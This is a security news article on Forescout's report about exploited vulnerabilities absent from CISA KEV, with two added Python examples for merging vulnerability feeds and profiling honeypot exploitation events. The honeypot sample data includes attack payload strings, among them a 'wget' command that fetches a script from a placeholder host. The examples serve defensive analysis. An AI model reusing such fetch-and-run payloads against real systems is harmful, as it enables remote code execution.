Forescout analyzes 90,000 unknown vulnerabilities, risk blind spots that live in the wild

Researchers at Forescout’s Vedere Labs identified roughly 90,000 vulnerabilities that fall outside standard vulnerability guidance: risk blind spots that are not included in the CISA Known Exploited Vulnerabilities (KEV) catalog and that adversaries could exploit. The analysis also found that vulnerabilities are scored inconsistently across databases, a process that within the CVE ecosystem normally relies on CVSS scores.

The research, titled ‘Exposing the Exploited,’ found that thousands of devices are affected by 28 exploited vulnerabilities in Forescout’s own catalog that CISA does not track, and that 83 percent of exploited vulnerabilities carry a high or critical CVSS score. More than 21,200 issues discovered in 2023 had no CVE ID assigned, up 4 percent from 2022 and 45 percent from 2021.

Of the vulnerabilities without a CVE ID, Forescout said, 44 percent can be used to gain access to a system and 37 percent are rated high or critical. Among exploited vulnerabilities, 45 (2.15 percent of the total) had no CVE ID. The most common CVSS score was 9.8, assigned to 571 vulnerabilities, while only 92 scored a full 10.

Across the four databases examined (CISA KEV, AttackerKB, Shadowserver, and Forescout’s own VL-KEV), a total of 2,087 distinct exploited vulnerabilities were seen. No single database contained all of them: CISA KEV held 1,055, or 50 percent of the total; 968 (47 percent) appeared in only one database; and just 90 (4 percent) appeared in all four.

The data indicates that the most exploited OT and IoT devices include network attached storage (NAS) at 21 percent, IP cameras at 17 percent, building automation devices at 12 percent, and VoIP equipment at 11 percent.

“Vulnerabilities are being found, weaponized, and exploited in the wild faster than ever before, with 97 0-days exploited in 2023 and already 27 this year,” Elisa Costante, vice president of research at Forescout Research – Vedere Labs, said in a media statement. “Current methodologies for cataloging issues such as MITRE’s Common Vulnerabilities and Exposures (CVE) system and NIST’s National Vulnerability Database (NVD) are critical tools but have significant limitations. This research shows that even FIRST’s Common Vulnerability Scoring System (CVSS), the Exploit Prediction Scoring System (EPSS), and CISA’s Known Exploited Vulnerabilities (KEV) should not be used exclusively.”

“Only with the full picture of what a device is, how it is configured, and how it behaves on the network can a database of exploited vulnerabilities be effectively used for patching prioritization and risk mitigation,” according to a blog post. “This is especially true for OT networks where patching is a time-consuming effort that needs to be carefully planned.”

The research also disclosed ‘easy to find’ examples of vulnerabilities affecting Chinese devices commonly used in the West that do not have a CVE ID. “For example, there were 64,125 Chinese-made Ruijie routers exposed on the Internet at the time of writing this report. Some of these routers are vulnerable to at least two issues that we see exploited but have no CVE IDs: CNVD-2021-09650 and SSV-89107. They are most popular in China (73%), but there are thousands in the US (6,155) and UK (1,197), as well as hundreds in Japan (839) and several European countries, including Germany (790),” it added. 

It also identified that there is no consistent way to score vulnerabilities across databases, whereas within the CVE ecosystem scoring is done with CVSS. IBM X-Force, for example, records the consequences and risks of many vulnerabilities in its database, including ones without a CVE ID.

Forescout said that gaining access to a system is the most common consequence of vulnerabilities without a CVE ID, possible with 44 percent of them. At the same time, 56 percent of these vulnerabilities are rated ‘medium’ risk (a score between 4.0 and 6.9), while 37 percent are rated high or critical.

Furthermore, the data disclosed that the definition of what is exploited can change depending on the information source. “For instance, once a vulnerability is added to the CISA KEV, it is not removed afterward. Whereas sources based on honeypot data tend to be ‘dynamic’ in the sense that they reflect vulnerabilities that are currently being exploited. Some lists are manually updated based on human analysis. Others are automatically updated. For example, they could be based on detection rules from monitoring systems,” it added. 

“There was a total of 2,087 distinct exploited vulnerabilities seen across the databases, but no database alone contains all the information. The database with the most vulnerabilities was AttackerKB, with 1,460 (70% of the total), but it relies on community information that potentially includes false positives,” the research revealed. “The database with the least vulnerabilities was Shadowserver, but that is because it relies solely on honeypot data which will miss the actions of targeted APTs, for instance, and only includes timely information, not historically exploited issues. CISA had 1,055 or 50% of the total exploited vulnerabilities.” 

Additionally, each database contained several ‘unique’ vulnerabilities, those reported by that one database and no other. The database with the most unique vulnerabilities was AttackerKB. The one with the fewest was CISA KEV, because most of its entries are also reported in AttackerKB by the community. Overall, 968 exploited vulnerabilities (47% of the total) are seen in only one database. Only 90 (4%) are seen in all four, meaning that relying on any one database alone can be dangerous.
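Cross-checking exploited-vulnerability feeds the way the report describes is a set-overlap exercise. The Python below is an added example, not Forescout’s tooling: it parses a constructed catalog written in the CISA KEV JSON layout (the field names follow the public catalog; the vendor names, entries and year-0000 IDs are placeholders), merges it with three constructed ID sets standing in for AttackerKB, Shadowserver and VL-KEV, reports the same overlap figures as the study (distinct total, single-source and all-source counts, per-database uniques), lists what the KEV baseline lacks, and flags KEV entries whose requiredAction text points to disconnecting rather than patching. The two non-CVE identifiers are the ones the report cites for Ruijie routers; the disconnect check is a keyword heuristic on free text, not an official KEV flag.

```python
import json


def _entry(vid: str, product: str, action: str) -> dict:
    """One record in the CISA KEV JSON layout (constructed placeholder, not a real KEV entry)."""
    return {"cveID": vid, "vendorProject": "ExampleVendor", "product": product,
            "vulnerabilityName": "placeholder", "dateAdded": "2024-01-02",
            "shortDescription": "placeholder", "requiredAction": action,
            "dueDate": "2024-01-23", "knownRansomwareCampaignUse": "Unknown", "notes": ""}


# Constructed sample catalog; year-0000 IDs cannot collide with real CVE IDs.
SAMPLE_KEV_JSON = json.dumps({
    "title": "constructed sample, not the CISA catalog",
    "catalogVersion": "0000.00.00",
    "count": 4,
    "vulnerabilities": [
        _entry("CVE-0000-0001", "ExampleNAS", "Apply mitigations per vendor instructions."),
        _entry("CVE-0000-0002", "ExampleCamera", "Apply updates per vendor instructions."),
        _entry("CVE-0000-0003", "ExampleBMS", "Apply updates per vendor instructions."),
        _entry("CVE-0000-0004", "ExampleRouter",
               "The impacted product is end-of-life and should be disconnected if still in use."),
    ],
})


def load_kev(text: str) -> dict[str, dict]:
    """Index a KEV-format catalog by its cveID field."""
    return {v["cveID"]: v for v in json.loads(text)["vulnerabilities"]}


KEV = load_kev(SAMPLE_KEV_JSON)

# Constructed ID sets standing in for the other three databases the report compared.
SOURCES = {
    "CISA KEV": set(KEV),
    "AttackerKB": {"CVE-0000-0001", "CVE-0000-0002", "CVE-0000-0003", "CVE-0000-0005", "CVE-0000-0006"},
    "Shadowserver": {"CVE-0000-0001", "CVE-0000-0005", "CNVD-2021-09650"},
    "VL-KEV": {"CVE-0000-0001", "CVE-0000-0002", "CNVD-2021-09650", "SSV-89107"},
}


def merge_sources(sources: dict[str, set[str]]) -> dict[str, list[str]]:
    """Map every vulnerability ID to the sorted list of sources reporting it as exploited."""
    merged: dict[str, list[str]] = {}
    for name, ids in sources.items():
        for vid in ids:
            merged.setdefault(vid, []).append(name)
    return {vid: sorted(names) for vid, names in merged.items()}


def coverage(sources: dict[str, set[str]]) -> dict:
    """The report's overlap statistics: distinct total, per-source counts, IDs seen in one source only,
    IDs seen in every source, and the IDs each database reports that no other one does."""
    merged = merge_sources(sources)
    return {
        "total": len(merged),
        "per_source": {name: len(ids) for name, ids in sources.items()},
        "single_source": sum(1 for names in merged.values() if len(names) == 1),
        "in_all": sum(1 for names in merged.values() if len(names) == len(sources)),
        "unique": {name: sorted(v for v, names in merged.items() if names == [name]) for name in sources},
    }


def missing_from(sources: dict[str, set[str]], baseline: str) -> list[str]:
    """Exploited IDs that at least one other source reports but the baseline (e.g. CISA KEV) lacks."""
    others = set().union(*(ids for name, ids in sources.items() if name != baseline))
    return sorted(others - sources[baseline])


def unpatchable(kev: dict[str, dict]) -> set[str]:
    """KEV entries whose required action says to disconnect rather than patch.
    Keyword heuristic over the free-text requiredAction field, not an official KEV flag."""
    return {vid for vid, rec in kev.items()
            if any(k in rec["requiredAction"].lower() for k in ("end-of-life", "disconnect"))}


if __name__ == "__main__":
    stats = coverage(SOURCES)
    print(f"{stats['total']} distinct exploited IDs; {stats['single_source']} seen in one source only; "
          f"{stats['in_all']} seen in all {len(SOURCES)}")
    for name, ids in stats["unique"].items():
        print(f"  only in {name}: {ids or '-'}")
    print("exploited but absent from CISA KEV:", missing_from(SOURCES, "CISA KEV"))
    print("KEV entries with disconnect-only guidance:", sorted(unpatchable(KEV)))
```

The report’s percentages are these counts divided by the distinct total; with the real feeds, replace SOURCES with the ID sets pulled from each database and keep the merged map, since the IDs it attributes to a single source are the ones a KEV-only process would never see.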

Overall, more recent vulnerabilities are more likely to be exploited, Forescout reported. “In 2020, there was a sharp increase. Based on all available data, 55% of exploited vulnerabilities have been disclosed since 2020. Honeypot data (Shadowserver and part of VL-KEV) shows 61% of vulnerabilities were disclosed since 2020.”

After establishing what is exploited, Forescout looked at how these vulnerabilities are exploited. To do so, “we used only the data from VL-KEV vulnerabilities coming from AEE since those are the only ones for which we have information about exploit payloads and who was exploiting them.”

The research highlighted four key characteristics of exploited vulnerabilities: occurrences indicate the frequency of exploitation, IPs show the number of unique IP addresses attempting exploitation, days reveal the duration between the first and last exploitation, and payloads signify the variety of ways the vulnerability was exploited.

“More than a quarter of vulnerabilities were always exploited with the exact same payload,” it added. “Half of them were exploited with between two and ten different payloads. Only 2% of vulnerabilities were exploited with more than 1,000 different payloads. In most cases, these payloads come directly from or are small changes to public proof-of-concept (PoC) exploits.”
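The four characteristics above (occurrences, distinct IPs, days between first and last attempt, distinct payloads) are straightforward to derive from honeypot telemetry. The Python below is an added example, not Forescout’s code or data: it aggregates a handful of constructed events (RFC 5737 documentation IPs, year-0000 placeholder IDs) into that profile, and additionally collapses payloads into families by masking the URL and IP literals that attackers usually swap out when reusing a public PoC, which is the “small changes” pattern the quote describes. The bucket boundaries follow the quoted breakdown (one payload, two to ten, over a thousand).

```python
import csv
import re
from datetime import datetime
from io import StringIO

# Constructed honeypot events (not Forescout's AEE data): timestamp, source IP, vulnerability ID, payload.
SAMPLE_EVENTS = """\
timestamp,src_ip,vuln_id,payload
2024-03-01T10:00:00Z,203.0.113.5,CVE-0000-0001,cmd=id
2024-03-01T10:05:00Z,203.0.113.5,CVE-0000-0001,cmd=id
2024-03-04T08:00:00Z,198.51.100.7,CVE-0000-0001,cmd=id
2024-03-02T12:00:00Z,203.0.113.9,CVE-0000-0002,cmd=wget%20http://203.0.113.250/x.sh
2024-03-12T12:00:00Z,198.51.100.3,CVE-0000-0002,cmd=wget%20http://198.51.100.250/y.sh
2024-03-02T13:00:00Z,203.0.113.9,CVE-0000-0002,cmd=id
"""

URL_RE = re.compile(r"https?://\S+")
IP_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def normalize_payload(payload: str) -> str:
    """Mask the parts attackers typically change when reusing a public PoC (download URL,
    callback IP) so that trivial variants of one exploit count as a single payload family."""
    return IP_RE.sub("<ip>", URL_RE.sub("<url>", payload))


def profile_exploitation(events_csv: str) -> dict[str, dict]:
    """Per vulnerability: occurrences, distinct source IPs, calendar days between first and last
    attempt, distinct raw payloads, and distinct normalized payload families."""
    raw: dict[str, dict] = {}
    for row in csv.DictReader(StringIO(events_csv)):
        ts = datetime.strptime(row["timestamp"], "%Y-%m-%dT%H:%M:%SZ")
        p = raw.setdefault(row["vuln_id"], {"n": 0, "ips": set(), "payloads": set(),
                                            "families": set(), "first": ts, "last": ts})
        p["n"] += 1
        p["ips"].add(row["src_ip"])
        p["payloads"].add(row["payload"])
        p["families"].add(normalize_payload(row["payload"]))
        p["first"] = min(p["first"], ts)
        p["last"] = max(p["last"], ts)
    return {vid: {"occurrences": p["n"],
                  "ips": len(p["ips"]),
                  "days": (p["last"].date() - p["first"].date()).days,
                  "payloads": len(p["payloads"]),
                  "payload_families": len(p["families"])}
            for vid, p in raw.items()}


def payload_bucket(n_payloads: int) -> str:
    """Payload-diversity buckets matching the report's breakdown."""
    if n_payloads <= 1:
        return "single"
    if n_payloads <= 10:
        return "2-10"
    if n_payloads <= 1000:
        return "11-1000"
    return "over-1000"


if __name__ == "__main__":
    for vid, prof in profile_exploitation(SAMPLE_EVENTS).items():
        print(vid, prof, payload_bucket(prof["payloads"]))
```

Raw payload counts overstate attacker effort when the only difference between samples is the staging server; comparing the payloads column with payload_families shows how much of the variety is PoC reuse rather than new tradecraft.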

Although CISA lists the existence of ‘a clear remediation action’ as a criterion for inclusion in KEV, that does not always mean the vulnerability can be patched. In some cases the product is discontinued and no patch is available; in others, only some versions can be patched while the rest are considered end-of-life. Where there is no patch, CISA recommends that users disconnect the affected devices.

Forescout concluded that given the growing number of vulnerabilities found and exploited by malicious actors, organizations need help to understand what to prioritize. “CISA KEV is an important resource to help with this prioritization by identifying vulnerabilities that have been or are being exploited, but it suffers from issues. They include a lack of transparency on the selection of vulnerabilities.”

The Forescout report demonstrates that numerous exploited vulnerabilities impacting real organizations are not covered in CISA KEV. It also highlights the absence of a single comprehensive database for all exploited vulnerabilities, emphasizing the need for organizations to consult multiple sources. It’s essential to note that simply listing exploited vulnerabilities is insufficient without actionable risk mitigation strategies. For instance, a device with a vulnerable HTTP server version may not pose an immediate risk if the service is disabled.

To implement risk mitigation in a timely and efficient manner, organizations need a way to automatically identify the assets on their network, determine which of those assets’ issues are currently being exploited, and understand the context in which the assets are actually vulnerable.

Last month, Forescout raised the alarm about ignored security threats to exposed critical infrastructure environments. That report examined how exposed OT/ICS (operational technology/industrial control system) data evolved from 2017 to 2024 and highlighted a complete disregard for critical infrastructure threats, along with the possibility of a mass attack.
